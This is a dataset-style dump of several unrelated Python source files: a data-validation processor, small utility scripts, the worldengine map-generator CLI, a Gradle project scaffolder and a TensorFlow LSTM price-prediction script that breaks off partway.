dd42b95f87eaaca428595fe5da639f9a710afba8
|
[
"MIT"
] | null | null | null |
datachecker/processors/conditionals.py
|
jayclassless/datachecker
|
dd42b95f87eaaca428595fe5da639f9a710afba8
|
[
"MIT"
] | null | null | null |
from ..errors import DataRequiredError, ShortCircuitSignal
from ..util import processor
__all__ = (
'required',
'optional',
)
@processor
def required():
def required_processor(data):
if data is None:
raise DataRequiredError()
return data
return required_processor
@processor
def optional(default=None):
def optional_processor(data):
if data is None:
signal = ShortCircuitSignal()
signal.data = default
raise signal
return data
return optional_processor
| 18.8
| 58
| 0.64539
| 0
| 0
| 0
| 0
| 421
| 0.746454
| 0
| 0
| 20
| 0.035461
|
b0eca7b772b3e9b8c51b6d9de56d789e01ceaffc
| 226
|
py
|
Python
|
python/args/multiple.py
|
jdurbin/sandbox
|
ee982f7386ae02c5937dbaee867710b5cd2cc71b
|
[
"MIT"
] | null | null | null |
python/args/multiple.py
|
jdurbin/sandbox
|
ee982f7386ae02c5937dbaee867710b5cd2cc71b
|
[
"MIT"
] | null | null | null |
python/args/multiple.py
|
jdurbin/sandbox
|
ee982f7386ae02c5937dbaee867710b5cd2cc71b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys,argparse
parser = argparse.ArgumentParser()
parser.add_argument('-foo', nargs='+', help='foo values', required=False, default=[])
args = parser.parse_args()
for foo in args.foo:
	print("Foo: ", foo)
| 20.545455
| 73
| 0.70354
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 50
| 0.221239
|
b0ed0165784914f7dc8282f6f368dd72c90b41f2
| 1,594
|
py
|
Python
|
src/parent_class/ParentPluralList.py
|
jameskabbes/parent_class
|
cecf938a2f9c66d8914967098b2064526bbec1c7
|
[
"MIT"
] | null | null | null |
src/parent_class/ParentPluralList.py
|
jameskabbes/parent_class
|
cecf938a2f9c66d8914967098b2064526bbec1c7
|
[
"MIT"
] | null | null | null |
src/parent_class/ParentPluralList.py
|
jameskabbes/parent_class
|
cecf938a2f9c66d8914967098b2064526bbec1c7
|
[
"MIT"
] | null | null | null |
from parent_class import ParentPlural
from typing import List
class ParentPluralList( ParentPlural ):
def __init__( self, att = 'list' ):
ParentPlural.__init__( self, att = att )
self.set_attr( self.att, [] )
def __len__( self ):
return len(self.get_list())
def __next__( self ):
self.i += 1
if self.i >= len(self):
raise StopIteration
else:
return self.get_list()[ self.i ]
    def _add( self, value ):
        lst = self.get_list()
        lst.append( value )
        self.set_list( lst )
def _remove( self, Inst, all_occurences = False ) -> bool:
"""remove the Inst from the class List"""
removed = False
inds = []
Insts = list(self)
for i in range(len(self)):
if Insts[i] == Inst:
inds.append(i)
removed = True
if not all_occurences:
break
self._remove_inds( inds )
return removed
    def _remove_inds( self, inds: List[int] ):
        """Given a list of indices, remove the Objects at those indices from the class List"""
        lst = self.get_list()
        inds.sort( reverse=True )
        for ind in inds:
            del lst[ind]
        self.set_list( lst )
def set_list( self, list ):
self.set_attr( self.att, list )
def get_list( self ):
return self.get_attr( self.att )
if __name__ == '__main__':
a = ParentPluralList()
a.print_atts()
| 21.835616
| 95
| 0.527604
| 1,456
| 0.913425
| 0
| 0
| 0
| 0
| 0
| 0
| 144
| 0.090339
|
b0ed1693b1a77aee2f28b941c3d753890e7d9408
| 1,454
|
py
|
Python
|
prototypes/harvesters/cxidb_harvester.py
|
materials-data-facility/connect
|
9ec5b61750bf6fa579bf3ec122f31880d3c049b8
|
[
"Apache-2.0"
] | 1
|
2019-09-13T18:35:56.000Z
|
2019-09-13T18:35:56.000Z
|
prototypes/harvesters/cxidb_harvester.py
|
materials-data-facility/connect_server
|
9ec5b61750bf6fa579bf3ec122f31880d3c049b8
|
[
"Apache-2.0"
] | 15
|
2018-11-01T18:08:11.000Z
|
2021-12-06T17:55:03.000Z
|
prototypes/harvesters/cxidb_harvester.py
|
materials-data-facility/connect
|
9ec5b61750bf6fa579bf3ec122f31880d3c049b8
|
[
"Apache-2.0"
] | 1
|
2020-11-30T17:02:41.000Z
|
2020-11-30T17:02:41.000Z
|
import requests
from json import dump
import os
from shutil import rmtree
from tqdm import tqdm
#Collects available data from CXIDB and saves to the given directory
#out_dir: The path to the directory (which will be created) for the data files
#existing_dir:
# -1: Remove out_dir if it exists
# 0: Error if out_dir exists (Default)
# 1: Overwrite files in out_dir if there are path collisions
#verbose: Print status messages? Default False
def harvest(out_dir, existing_dir=0, verbose=False):
if os.path.exists(out_dir):
if existing_dir == 0:
exit("Directory '" + out_dir + "' exists")
elif not os.path.isdir(out_dir):
exit("Error: '" + out_dir + "' is not a directory")
elif existing_dir == -1:
rmtree(out_dir)
os.mkdir(out_dir)
else:
os.mkdir(out_dir)
#Fetch list of ids
id_res = requests.get("http://cxidb.org/index.json")
if id_res.status_code != 200:
exit("IDs GET failure: " + str(id_res.status_code) + " error")
id_list = id_res.json()
for id_entry in tqdm(id_list, desc="Fetching metadata", disable= not verbose):
id_data = requests.get("http://cxidb.org/" + id_entry)
if id_data.status_code != 200:
exit("ID fetch failure: " + str(id_data.status_code) + " error")
with open(os.path.join(out_dir, id_entry), 'w') as out_file:
dump(id_data.json(), out_file)
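# Illustrative invocation (the output directory name is a made-up example):
#   harvest("cxidb_metadata", existing_dir=-1, verbose=True)
# fetches http://cxidb.org/index.json and writes one JSON metadata file per entry
# into ./cxidb_metadata/.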
| 36.35
| 82
| 0.643741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 555
| 0.381706
|
b0ed5b6a6f6876d6d3b9b9b973debc09d4041302
| 136
|
py
|
Python
|
bot/permissions.py
|
Yakov-Varnaev/Epicker_bot
|
da077e0bcfbd41a2efaed74d71e7c4c818b842c0
|
[
"MIT"
] | null | null | null |
bot/permissions.py
|
Yakov-Varnaev/Epicker_bot
|
da077e0bcfbd41a2efaed74d71e7c4c818b842c0
|
[
"MIT"
] | null | null | null |
bot/permissions.py
|
Yakov-Varnaev/Epicker_bot
|
da077e0bcfbd41a2efaed74d71e7c4c818b842c0
|
[
"MIT"
] | null | null | null |
from aiogram import types
import config
async def is_admin(message: types.Message):
return message.from_user.id in config.ADMINS
| 17
| 48
| 0.786765
| 0
| 0
| 0
| 0
| 0
| 0
| 92
| 0.676471
| 0
| 0
|
b0f062298bedb55fde1aeecf88bc32677fffabc9
| 127
|
py
|
Python
|
ssshare/__init__.py
|
centaur679/ShadowSocksShare
|
41f85e9a0adc1322fd8f254a1c1a5360d228507a
|
[
"Apache-2.0"
] | 2,341
|
2019-03-04T05:41:12.000Z
|
2022-03-31T11:30:40.000Z
|
ssshare/__init__.py
|
centaur679/ShadowSocksShare
|
41f85e9a0adc1322fd8f254a1c1a5360d228507a
|
[
"Apache-2.0"
] | 50
|
2019-03-24T01:35:13.000Z
|
2021-09-09T22:59:15.000Z
|
ssshare/__init__.py
|
centaur679/ShadowSocksShare
|
41f85e9a0adc1322fd8f254a1c1a5360d228507a
|
[
"Apache-2.0"
] | 780
|
2019-03-04T07:33:37.000Z
|
2022-03-22T23:32:53.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask
app = Flask(__name__)
app.config.from_object("config")
| 15.875
| 32
| 0.685039
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 52
| 0.409449
|
b0f238f39a9f9a11e1383c07dd66cb298f4de952
| 21,160
|
py
|
Python
|
worldengine/cli/main.py
|
stefan-feltmann/lands
|
b2f1fc3aab4895763160a135d085a17dceb5f58e
|
[
"MIT"
] | null | null | null |
worldengine/cli/main.py
|
stefan-feltmann/lands
|
b2f1fc3aab4895763160a135d085a17dceb5f58e
|
[
"MIT"
] | null | null | null |
worldengine/cli/main.py
|
stefan-feltmann/lands
|
b2f1fc3aab4895763160a135d085a17dceb5f58e
|
[
"MIT"
] | null | null | null |
import sys
from argparse import ArgumentParser
import os
import pickle
import random
import worldengine.generation as geo
from worldengine.common import array_to_matrix, set_verbose, print_verbose
from worldengine.draw import draw_ancientmap_on_file, draw_biome_on_file, draw_ocean_on_file, \
draw_precipitation_on_file, draw_grayscale_heightmap_on_file, draw_simple_elevation_on_file, \
draw_temperature_levels_on_file, draw_riversmap_on_file
from worldengine.plates import world_gen, generate_plates_simulation
from worldengine.step import Step
from worldengine.world import World
from worldengine.version import __version__
VERSION = __version__
OPERATIONS = 'world|plates|ancient_map|info'
SEA_COLORS = 'blue|brown'
STEPS = 'plates|precipitations|full'
def generate_world(world_name, width, height, seed, num_plates, output_dir,
step, ocean_level, world_format='pickle', verbose=True, black_and_white=False):
w = world_gen(world_name, width, height, seed, num_plates, ocean_level,
step, verbose=verbose)
print('') # empty line
    print('Producing output:')
sys.stdout.flush()
# Save data
filename = "%s/%s.world" % (output_dir, world_name)
with open(filename, "wb") as f:
if world_format == 'pickle':
pickle.dump(w, f, pickle.HIGHEST_PROTOCOL)
elif world_format == 'protobuf':
f.write(w.protobuf_serialize())
else:
print("Unknown format '%s', not saving " % world_format)
print("* world data saved in '%s'" % filename)
sys.stdout.flush()
# Generate images
filename = '%s/%s_ocean.png' % (output_dir, world_name)
draw_ocean_on_file(w.ocean, filename)
print("* ocean image generated in '%s'" % filename)
if step.include_precipitations:
filename = '%s/%s_precipitation.png' % (output_dir, world_name)
draw_precipitation_on_file(w, filename, black_and_white)
print("* precipitation image generated in '%s'" % filename)
filename = '%s/%s_temperature.png' % (output_dir, world_name)
draw_temperature_levels_on_file(w, filename, black_and_white)
print("* temperature image generated in '%s'" % filename)
if step.include_biome:
filename = '%s/%s_biome.png' % (output_dir, world_name)
draw_biome_on_file(w, filename)
print("* biome image generated in '%s'" % filename)
filename = '%s/%s_elevation.png' % (output_dir, world_name)
sea_level = w.sea_level()
draw_simple_elevation_on_file(w.elevation['data'], filename, width=width,
height=height, sea_level=sea_level)
print("* elevation image generated in '%s'" % filename)
return w
def generate_grayscale_heightmap(world, filename):
draw_grayscale_heightmap_on_file(world, filename)
print("+ grayscale heightmap generated in '%s'" % filename)
def generate_rivers_map(world, filename):
draw_riversmap_on_file(world, filename)
print("+ rivers map generated in '%s'" % filename)
def generate_plates(seed, world_name, output_dir, width, height,
num_plates=10):
"""
Eventually this method should be invoked when generation is called at
asked to stop at step "plates", it should not be a different operation
:param seed:
:param world_name:
:param output_dir:
:param width:
:param height:
:param num_plates:
:return:
"""
elevation, plates = generate_plates_simulation(seed, width, height,
num_plates=num_plates)
world = World(world_name, width, height, seed, num_plates, -1.0, "plates")
world.set_elevation(array_to_matrix(elevation, width, height), None)
world.set_plates(array_to_matrix(plates, width, height))
# Generate images
filename = '%s/plates_%s.png' % (output_dir, world_name)
# TODO calculate appropriate sea_level
sea_level = 1.0
draw_simple_elevation_on_file(world.elevation['data'], filename, width,
height, sea_level)
print("+ plates image generated in '%s'" % filename)
geo.center_land(world)
filename = '%s/centered_plates_%s.png' % (output_dir, world_name)
draw_simple_elevation_on_file(world.elevation['data'], filename, width,
height, sea_level)
print("+ centered plates image generated in '%s'" % filename)
def check_step(step_name):
step = Step.get_by_name(step_name)
if step is None:
print("ERROR: unknown step name, using default 'full'")
return Step.get_by_name("full")
else:
return step
def operation_ancient_map(world, map_filename, resize_factor, sea_color,
draw_biome, draw_rivers, draw_mountains,
draw_outer_land_border):
draw_ancientmap_on_file(world, map_filename, resize_factor, sea_color,
draw_biome, draw_rivers, draw_mountains,
draw_outer_land_border)
print("+ ancient map generated in '%s'" % map_filename)
def __get_last_byte__(filename):
with open(filename, 'rb') as input_file:
data = tmp_data = input_file.read(1024 * 1024)
while tmp_data:
tmp_data = input_file.read(1024 * 1024)
if tmp_data:
data = tmp_data
return ord(data[len(data) - 1])
def __varint_to_value__(varint):
    # See https://developers.google.com/protocol-buffers/docs/encoding for details.
    # Varints are little-endian: the first byte holds the least significant 7 bits,
    # so the value is the first byte, plus the second byte multiplied by 128,
    # plus the third multiplied by 128 ** 2, and so on.
if len(varint) == 1:
return varint[0]
else:
return varint[0] + 128 * __varint_to_value__(varint[1:])
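# Worked example: the 7-bit groups [0b0101100, 0b0000010] decode to
# 44 + 128 * 2 = 300, matching the varint example in the protobuf encoding docs.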
def __get_tag__(filename):
with open(filename, 'rb') as ifile:
# drop first byte, it should tell us the protobuf version and it
# should be normally equal to 8
data = ifile.read(1)
if not data:
return None
done = False
tag_bytes = []
# We read bytes until we find a bit with the MSB not set
while data and not done:
data = ifile.read(1)
if not data:
return None
value = ord(data)
tag_bytes.append(value % 128)
if value < 128:
done = True
        # __varint_to_value__ treats the collected 7-bit groups as little-endian:
        # the first byte is the least significant, and each following byte
        # contributes another factor of 128
return __varint_to_value__(tag_bytes)
def __seems_protobuf_worldfile__(world_filename):
worldengine_tag = __get_tag__(world_filename)
return worldengine_tag == World.worldengine_tag()
def __seems_pickle_file__(world_filename):
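    # pickle streams always end with the STOP opcode, the '.' byte, so checking
    # the last byte of the file is a cheap heuristic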
last_byte = __get_last_byte__(world_filename)
return last_byte == ord('.')
def load_world(world_filename):
pb = __seems_protobuf_worldfile__(world_filename)
pi = __seems_pickle_file__(world_filename)
if pb and pi:
print("we cannot distinguish if the file is a pickle or a protobuf "
"world file. Trying to load first as protobuf then as pickle "
"file")
try:
return World.open_protobuf(world_filename)
except Exception:
try:
return World.from_pickle_file(world_filename)
except Exception:
raise Exception("Unable to load the worldfile neither as protobuf or pickle file")
elif pb:
return World.open_protobuf(world_filename)
elif pi:
return World.from_pickle_file(world_filename)
else:
raise Exception("The given worldfile does not seem a pickle or a protobuf file")
def print_world_info(world):
print(" name : %s" % world.name)
print(" width : %i" % world.width)
print(" height : %i" % world.height)
print(" seed : %i" % world.seed)
print(" no plates : %i" % world.n_plates)
print(" ocean level : %f" % world.ocean_level)
print(" step : %s" % world.step.name)
print(" has biome : %s" % world.has_biome())
print(" has humidity : %s" % world.has_humidity())
print(" has irrigation : %s" % world.has_irrigation())
print(" has permeability : %s" % world.has_permeability())
print(" has watermap : %s" % world.has_watermap())
print(" has precipitations : %s" % world.has_precipitations())
print(" has temperature : %s" % world.has_temperature())
def main():
parser = ArgumentParser(
usage="usage: %(prog)s [options] [" + OPERATIONS + "]")
parser.add_argument('OPERATOR', nargs='?')
parser.add_argument('FILE', nargs='?')
parser.add_argument(
'-o', '--output-dir', dest='output_dir',
help="generate files in DIR [default = '%(default)s']",
metavar="DIR", default='.')
parser.add_argument(
'-n', '--worldname', dest='world_name',
help="set world name to STR. output is stored in a " +
"world file with the name format 'STR.world'. If " +
"a name is not provided, then seed_N.world, " +
"where N=SEED",
metavar="STR")
# TODO: add description of protocol buffer
parser.add_argument('-b', '--protocol-buffer', dest='protobuf',
action="store_true",
help="Save world file using protocol buffer format. " +
"Default = store using pickle format",
default=False)
parser.add_argument('-s', '--seed', dest='seed', type=int,
help="Use seed=N to initialize the pseudo-random " +
"generation. If not provided, one will be " +
"selected for you.",
metavar="N")
parser.add_argument('-t', '--step', dest='step',
help="Use step=[" + STEPS + "] to specify how far " +
"to proceed in the world generation process. " +
"[default='%(default)s']",
metavar="STR", default="full")
# TODO --step appears to be duplicate of OPERATIONS. Especially if
# ancient_map is added to --step
parser.add_argument('-x', '--width', dest='width', type=int,
help="N = width of the world to be generated " +
"[default=%(default)s]",
metavar="N",
default='512')
parser.add_argument('-y', '--height', dest='height', type=int,
help="N = height of the world to be generated " +
"[default=%(default)s]",
metavar="N",
default='512')
parser.add_argument('-q', '--number-of-plates', dest='number_of_plates',
type=int,
help="N = number of plates [default = %(default)s]",
metavar="N", default='10')
parser.add_argument('--recursion_limit', dest='recursion_limit', type=int,
help="Set the recursion limit [default = %(default)s]",
metavar="N", default='2000')
parser.add_argument('-v', '--verbose', dest='verbose', action="store_true",
help="Enable verbose messages", default=False)
parser.add_argument('--version', dest='version', action="store_true",
help="Display version information", default=False)
parser.add_argument('--bw', '--black-and-white', dest='black_and_white',
action="store_true",
help="generate maps in black and white",
default=False)
# -----------------------------------------------------
g_generate = parser.add_argument_group(
"Generate Options", "These options are only useful in plate and " +
"world modes")
g_generate.add_argument('-r', '--rivers', dest='rivers_map',
help="generate rivers map in FILE", metavar="FILE")
g_generate.add_argument('--gs', '--grayscale-heightmap',
dest='grayscale_heightmap',
help='produce a grayscale heightmap in FILE',
metavar="FILE")
g_generate.add_argument('--ocean_level', dest='ocean_level', type=float,
                            help='elevation cut off for sea level '
                                 '[default = %(default)s]',
metavar="N", default=1.0)
# -----------------------------------------------------
g_ancient_map = parser.add_argument_group(
"Ancient Map Options", "These options are only useful in " +
"ancient_map mode")
g_ancient_map.add_argument('-w', '--worldfile', dest='world_file',
help="FILE to be loaded", metavar="FILE")
g_ancient_map.add_argument('-g', '--generatedfile', dest='generated_file',
help="name of the FILE", metavar="FILE")
g_ancient_map.add_argument(
'-f', '--resize-factor', dest='resize_factor', type=int,
help="resize factor (only integer values). " +
"Note this can only be used to increase " +
"the size of the map [default=%(default)s]",
metavar="N", default='1')
g_ancient_map.add_argument('--sea_color', dest='sea_color',
help="string for color [" + SEA_COLORS + "]",
metavar="S", default="brown")
g_ancient_map.add_argument('--not-draw-biome', dest='draw_biome',
action="store_false",
help="Not draw biome",
default=True)
g_ancient_map.add_argument('--not-draw-mountains', dest='draw_mountains',
action="store_false",
help="Not draw mountains",
default=True)
g_ancient_map.add_argument('--not-draw-rivers', dest='draw_rivers',
action="store_false",
help="Not draw rivers",
default=True)
g_ancient_map.add_argument('--draw-outer-border', dest='draw_outer_border',
action="store_true",
help="Draw outer land border",
default=False)
# TODO: allow for RGB specification as [r g b], ie [0.5 0.5 0.5] for gray
args = parser.parse_args()
if args.version:
usage()
if os.path.exists(args.output_dir):
if not os.path.isdir(args.output_dir):
raise Exception("Output dir exists but it is not a dir")
else:
print('Directory does not exist, we are creating it')
os.makedirs(args.output_dir)
# it needs to be increased to be able to generate very large maps
# the limit is hit when drawing ancient maps
sys.setrecursionlimit(args.recursion_limit)
if args.number_of_plates < 1 or args.number_of_plates > 100:
usage(error="Number of plates should be a in [1, 100]")
operation = "world"
if args.OPERATOR is None:
pass
elif args.OPERATOR is not None and args.OPERATOR.lower() not in OPERATIONS:
parser.print_help()
usage("Only 1 operation allowed [" + OPERATIONS + "]")
else:
operation = args.OPERATOR.lower()
if args.OPERATOR == 'info':
if args.FILE is None:
parser.print_help()
usage("For operation info only the filename should be specified")
if not os.path.exists(args.FILE):
usage("The specified world file does not exist")
random.seed()
if args.seed:
seed = int(args.seed)
else:
seed = random.randint(0, 65536)
if args.world_name:
world_name = args.world_name
else:
world_name = "seed_%i" % seed
step = check_step(args.step)
world_format = 'pickle'
if args.protobuf:
world_format = 'protobuf'
generation_operation = (operation == 'world') or (operation == 'plates')
produce_grayscale_heightmap = args.grayscale_heightmap
if produce_grayscale_heightmap and not generation_operation:
usage(
error="Grayscale heightmap can be produced only during world " +
"generation")
if args.rivers_map and not generation_operation:
usage(error="Rivers map can be produced only during world generation")
print('Worldengine - a world generator (v. %s)' % VERSION)
print('-----------------------')
print(' operation : %s generation' % operation)
if generation_operation:
print(' seed : %i' % seed)
print(' name : %s' % world_name)
print(' width : %i' % args.width)
print(' height : %i' % args.height)
print(' number of plates : %i' % args.number_of_plates)
print(' world format : %s' % world_format)
print(' black and white maps : %s' % args.black_and_white)
print(' step : %s' % step.name)
if produce_grayscale_heightmap:
print(
' + greyscale heightmap in "%s"' % produce_grayscale_heightmap)
else:
print(' (no greyscale heightmap)')
if args.rivers_map:
print(' + rivers map in "%s"' % args.rivers_map)
else:
print(' (no rivers map)')
if operation == 'ancient_map':
print(' resize factor : %i' % args.resize_factor)
print(' world file : %s' % args.world_file)
print(' sea color : %s' % args.sea_color)
print(' draw biome : %s' % args.draw_biome)
print(' draw rivers : %s' % args.draw_rivers)
print(' draw mountains : %s' % args.draw_mountains)
print(' draw land outer border : %s' % args.draw_outer_border)
set_verbose(args.verbose)
if operation == 'world':
print('') # empty line
print('starting (it could take a few minutes) ...')
world = generate_world(world_name, args.width, args.height,
seed, args.number_of_plates, args.output_dir,
step, args.ocean_level, world_format,
args.verbose, black_and_white=args.black_and_white)
if produce_grayscale_heightmap:
generate_grayscale_heightmap(world, produce_grayscale_heightmap)
if args.rivers_map:
generate_rivers_map(world, args.rivers_map)
elif operation == 'plates':
print('') # empty line
print('starting (it could take a few minutes) ...')
generate_plates(seed, world_name, args.output_dir, args.width,
args.height, num_plates=args.number_of_plates)
elif operation == 'ancient_map':
print('') # empty line
print('starting (it could take a few minutes) ...')
# First, some error checking
if args.sea_color == "blue":
sea_color = (142, 162, 179, 255)
elif args.sea_color == "brown":
sea_color = (212, 198, 169, 255)
else:
usage("Unknown sea color: " + args.sea_color +
" Select from [" + SEA_COLORS + "]")
if not args.world_file:
usage(
"For generating an ancient map is necessary to specify the " +
"world to be used (-w option)")
world = load_world(args.world_file)
print_verbose(" * world loaded")
if not args.generated_file:
args.generated_file = "ancient_map_%s.png" % world.name
operation_ancient_map(world, args.generated_file,
args.resize_factor, sea_color,
args.draw_biome, args.draw_rivers,
args.draw_mountains, args.draw_outer_border)
elif operation == 'info':
world = load_world(args.FILE)
print_world_info(world)
else:
raise Exception(
'Unknown operation: valid operations are %s' % OPERATIONS)
print('...done')
def usage(error=None):
print(
' -------------------------------------------------------------------')
print(' Federico Tomassetti and Bret Curtis, 2011-2015')
print(' Worldengine - a world generator (v. %s)' % VERSION)
print(' ')
print(' worldengine <world_name> [operation] [options]')
print(' possible operations: %s' % OPERATIONS)
print(' use -h to see options')
print(
' -------------------------------------------------------------------')
if error:
print("ERROR: %s" % error)
sys.exit(' ')
# -------------------------------
if __name__ == "__main__":
main()
| 41.653543
| 98
| 0.57689
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,046
| 0.332987
|
b0f3965138dd98bc050b860206e62e5235246cb0
| 1,432
|
py
|
Python
|
poc-api-gateway/init-project.py
|
ronald-pineda/poc
|
b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3
|
[
"Apache-2.0"
] | null | null | null |
poc-api-gateway/init-project.py
|
ronald-pineda/poc
|
b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3
|
[
"Apache-2.0"
] | null | null | null |
poc-api-gateway/init-project.py
|
ronald-pineda/poc
|
b5bdb7eff963b251ea70cf02570c7d0b6cbef5e3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
import sys
import os
def create_project_folders(projectFolders):
create_folder(fullServicesFolder)
for projectIndex in range(len(projectFolders)):
projectFolder = fullServicesFolder + "/" + projectFolders[projectIndex]
create_folder(projectFolder)
open(projectFolder + "/build.gradle", "w").close()
create_project_subfolders(projectFolder)
f = open(os.getcwd() + "/settings.gradle", "a")
f.write("include '" + servicesFolder +
":" + projectFolders[projectIndex] + "'\n")
f.close()
def create_project_subfolders(projectFolder):
# print(projectFolder)
for srcFolderIndex in range(len(srcFolders)):
srcFolder = projectFolder + "/" + srcFolders[srcFolderIndex] + "/"
# print(srcFolder)
create_folder(srcFolder)
def create_folder(path):
try:
os.mkdir(path)
except OSError:
print ("create_folder failed : %s" % path)
else:
print ("create_folder succeed : %s" % path)
servicesFolder = sys.argv[1]
projectFolders = sys.argv[2].split(',')
# projectFolders = "project1 project2".split(' ')
# servicesFolderName = "/services"
srcFolders = "src src/main src/main/java src/main/resources src/test src/test/java src/test/resources".split(
' ')
currentPath = os.getcwd()
fullServicesFolder = currentPath + "/" + servicesFolder
create_project_folders(projectFolders)
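# Illustrative invocation (folder and project names are made-up examples):
#   python init-project.py services project1,project2
# creates ./services/project1 and ./services/project2, each with a build.gradle and
# the standard src/main and src/test trees, and appends include lines to settings.gradle.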
| 30.468085
| 109
| 0.672486
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 361
| 0.252095
|
b0f74b9d843423b3b2ee4eb76a8944598071e925
| 10,133
|
py
|
Python
|
lstm.py
|
mustyoshi/scikit-ta
|
c2a8f4ce2deadaa13d8bd8891aabd096b397e330
|
[
"MIT"
] | 1
|
2018-03-12T19:50:14.000Z
|
2018-03-12T19:50:14.000Z
|
lstm.py
|
mustyoshi/scikit-ta
|
c2a8f4ce2deadaa13d8bd8891aabd096b397e330
|
[
"MIT"
] | null | null | null |
lstm.py
|
mustyoshi/scikit-ta
|
c2a8f4ce2deadaa13d8bd8891aabd096b397e330
|
[
"MIT"
] | 1
|
2020-02-22T21:59:39.000Z
|
2020-02-22T21:59:39.000Z
|
from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import rnn
import pandas as pd
import numpy as np
import random
import time
import os
import datetime
from tensorflow.python.client import timeline
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from sklearn.pipeline import Pipeline
import mods
#from . import ProductionPipe
if __name__ == "__main__":
# Training Parameters
device="/gpu:0"
learning_rate = .0001
batch_size = (20*5)
display_step = 10
timesteps = 1 # timesteps
    num_classes = 2 # binary classes: price goes up over the lookforward window or not
def splitDataFrameIntoSmaller(df, chunkSize = batch_size):
listOfDf = list()
numberChunks = len(df) // chunkSize + 1
for i in range(numberChunks):
listOfDf.append(df[i*chunkSize:(i+1)*chunkSize])
return listOfDf
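    # Worked example: with the default chunkSize of 100 (batch_size = 20 * 5), a
    # 250-row frame yields chunks of 100, 100 and 50; when the length is an exact
    # multiple of chunkSize the final chunk comes out empty.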
to_drop = ['Date','Time','Open','High','Low','Close','Volume',"Period_4_Lookforward_p1","Period_4_Lookforward_p2"]
to_bool = []
create = True
if(create):
#df = pd.read_csv('dhy.us.txt',names=["Date","Time","Open","High","Low","Close","Volume","Ope"])
df = pd.read_csv('bac.us.txt')
origs = df[['Close']].copy()
#df = pd.read_csv('combined.csv',header=None,names=["Open","High","Low","Close","Volume"])
prod_pipe = mods.CreatePipeline() #Pipeline([('ft1',ft1),('ft2',ft2),('ft3',ft3)])
df['Period_4_Lookforward_p1'] = (df['Close'].shift(-4).astype(float) > df['Close'].astype(float))
df['Period_4_Lookforward_p2'] =(np.min([df['Low'].shift(-n) for n in range(1,4)],axis=0) > (df['Close'].astype(float)*.99)) #np.amax([df['Close'].shift(-n).astype(float) for n in range(1,4)],axis=0) > df['Close']
df['Period_4_Lookforward'] = (df['Period_4_Lookforward_p1'].astype(bool) == True) & (df['Period_4_Lookforward_p2'].astype(bool) == True)
df = prod_pipe.transform(df)
#to_bool.append('Period_4_Lookforward')
#for b in to_bool:
# df[b] = df[b].astype(bool)
df = df.dropna()
df.drop(df.index[:32], inplace=True,errors="ignore")
#df.to_csv('Hours.csv',index=False)
#df = df.drop(to_drop,axis=1)
df = df.astype(float)
df.to_csv('Hours.csv',index=False,float_format="%.8g")
else:
df = pd.read_csv('Hours.csv')
print(sum(df['Period_4_Lookforward'].values),'total ups',sum(df['Period_4_Lookforward'].values)/len(df))
num_input = len(df.columns)-1
num_hidden =num_input*20 # int((num_input*num_input)//2) # hidden layer num of features
train = df[:int(len(df)*0.9)]
test = df[len(train):]
dfs = splitDataFrameIntoSmaller(train)
training_steps = len(dfs)*100
del dfs[-1]
random.shuffle(dfs)
dfs.append(test)
print(num_input,'inputs')
print(num_hidden,'nodes per layer')
print(len(dfs),'batches')
print(len(test),'test parts')
ind = 0
# Network Parameters
with tf.device(device):
# tf Graph input
X = tf.placeholder("float", [None, timesteps, num_input])
Y = tf.placeholder("float", [None, num_classes])
# Define weights
weights = {
'out': tf.Variable(tf.random_normal([num_hidden, num_classes]))
}
biases = {
'out': tf.Variable(tf.random_normal([num_classes]))
}
def RNN(x, weights, biases):
# Prepare data shape to match `rnn` function requirements
# Current data input shape: (batch_size, timesteps, n_input)
# Required shape: 'timesteps' tensors list of shape (batch_size, n_input)
# Unstack to get a list of 'timesteps' tensors of shape (batch_size, n_input)
x = tf.unstack(x, timesteps, 1)
# Define a lstm cell with tensorflow
lstm_cell1 = rnn.LSTMBlockCell(num_hidden, forget_bias=1.0)
#lstm_cell = rnn.BasicRNNCell(num_hidden)
#lstm_cell = rnn.PhasedLSTMCell(num_hidden)
#lstm_cell2 = rnn.PhasedLSTMCell(num_hidden)
            lstm_cell1 = tf.nn.rnn_cell.DropoutWrapper(lstm_cell1, output_keep_prob=0.75)
            lstm_cell2 = rnn.LSTMBlockCell(num_hidden, forget_bias=1.0, use_peephole=True)
            # apply dropout to the second cell as well, so both stacked cells are regularized
            lstm_cell2 = tf.nn.rnn_cell.DropoutWrapper(lstm_cell2, output_keep_prob=0.75)
lstm_cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell1,lstm_cell2]*4)
# Get lstm cell output
outputs, states = rnn.static_rnn(lstm_cell, x, dtype=tf.float32)
# Linear activation, using rnn inner loop last output
return tf.matmul(outputs[-1], weights['out']) + biases['out']
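        # Shape check: X is (batch, timesteps, num_input); tf.unstack along axis 1
        # yields `timesteps` tensors of shape (batch, num_input), and the final
        # matmul maps the last output (batch, num_hidden) to (batch, num_classes).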
logits = RNN(X, weights, biases)
with tf.device("/cpu:0"):
prediction = tf.nn.softmax(logits)
# Define loss and optimizer
loss_op = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
logits=logits, labels=Y))
#optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
#optimizer = tf.train.AdagradOptimizer(learning_rate=learning_rate)
optimizer = tf.train.AdamOptimizer(learning_rate)
#optimizer = tf.train.FtrlOptimizer(learning_rate)
train_op = optimizer.minimize(loss_op)
# Evaluate model (with test logits, for dropout to be disabled)
correct_pred = tf.equal(tf.argmax(prediction, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
y_p = tf.argmax(prediction, 1)
init = tf.global_variables_initializer()
# Initialize the variables (i.e. assign their default value)
test_len = len(dfs[-1])
test_data = dfs[-1]
closes = origs.loc[test_data.index].values
test_data.reset_index(drop=True,inplace=True)
